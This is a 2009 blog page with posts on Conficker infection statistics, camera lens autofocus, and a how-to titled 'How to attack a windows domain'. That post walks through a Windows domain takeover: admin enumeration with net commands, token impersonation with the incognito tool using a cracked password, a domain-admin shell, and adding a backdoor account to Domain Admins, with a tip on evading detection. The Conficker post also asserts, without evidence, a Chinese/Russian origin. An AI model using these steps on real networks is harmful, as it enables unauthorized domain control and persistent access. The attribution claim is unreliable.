Old New Dream

October 8, 2009

R u Conficker Today?

Filed under: Uncategorized — Tags: — oldnewdream @ 9:31 PM

The daily trend of Conficker worm.

Day        Date        Total HTTP Hits  Unique IP's  Unique ASN's  Unique GEO's
Monday     2009-10-05      353,374,228    6,177,806        12,578           225
Sunday     2009-10-04      319,116,909    5,848,210        11,625           224
Saturday   2009-10-03      345,899,815    6,115,205        11,740           223
Friday     2009-10-02      324,444,402    5,903,585        12,420           225
Thursday   2009-10-01      311,329,747    6,161,260        12,562           225
Wednesday  2009-09-30      271,927,387    6,370,343        12,584           225
Tuesday    2009-09-29      321,617,133    6,419,746        12,560           224
Monday     2009-09-28      298,942,625    5,784,097        12,335           225
Sunday     2009-09-27      381,931,460    5,893,814        11,595           223
Saturday   2009-09-26      373,511,716    5,991,939        11,656           221
Friday     2009-09-25      420,454,010    6,349,116        12,466           225
Thursday   2009-09-24      359,456,435    6,190,332        12,546           224
Wednesday  2009-09-23      365,905,240    6,344,510        12,490           224
Tuesday    2009-09-22      412,112,235    6,317,103        12,555           224
Monday     2009-09-21      402,866,723    6,228,450        12,480           224
Sunday     2009-09-20      341,461,136    5,718,952        11,621           223
Saturday   2009-09-19      409,631,897    5,960,625        11,714           223
Friday     2009-09-18      395,422,099    6,173,654        12,477           223
Thursday   2009-09-17      429,063,096    6,402,387        12,599           223
Wednesday  2009-09-16      404,947,612    6,239,897        12,599           223
Tuesday    2009-09-15      435,608,525    6,443,852        12,556           223
Monday     2009-09-14      427,108,902    6,420,308        12,530           226
Sunday     2009-09-13      381,846,846    5,769,241        11,617           222
Saturday   2009-09-12      367,351,330    5,958,670        11,706           222
Friday     2009-09-11      217,895,581    5,763,953        12,176           224
Thursday   2009-09-10      323,857,258    6,299,152        12,380           223
Wednesday  2009-09-09      323,932,481    6,346,391        12,525           224
Tuesday    2009-09-08      267,769,518    6,233,405        12,444           223
Monday     2009-09-07      300,297,749    6,140,995        11,948           224
Sunday     2009-09-06      267,938,003    5,647,851        11,182           223

http://www.theregister.co.uk/2009/10/03/conficker_infects_oxford_brookes/

After reading the Deep Analysis of Conficker, we can 99% sure of this worm is crafted by the Chinese/Russian…Only them have the resource and rigid process flow to come up such amazing worm.
We can even sure there is a team of User Experience team that refine the worm and make it more simple to use/attack.

Patch your MS08-067 today?

GF-1 Autofocus Lense

Filed under: Uncategorized — Tags: , , , — oldnewdream @ 6:56 AM

Who say GF-1 got very limited AF lense?
Update the Zuiko 1442 firmware…and that Oly lense focus way way faster in GF-1 than in the slow EP-1 !!!

Take that, the oly fan !!!

Here the whole list of Lense support by GF-1

http://panasonic.jp/support/global/cs/dsc/connect/g1.html

October 3, 2009

How to attack a windows domain

Filed under: Uncategorized — oldnewdream @ 10:05 AM

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members
————————————–
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group “domain admins” /domain
net group “domain admins” /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

—————————————————
admin_valsmith Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found…

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c “blackhatadmin_valsmith” cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group “domain admins” hacked /add /domain
net group “domain admins” hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

Blog at WordPress.com.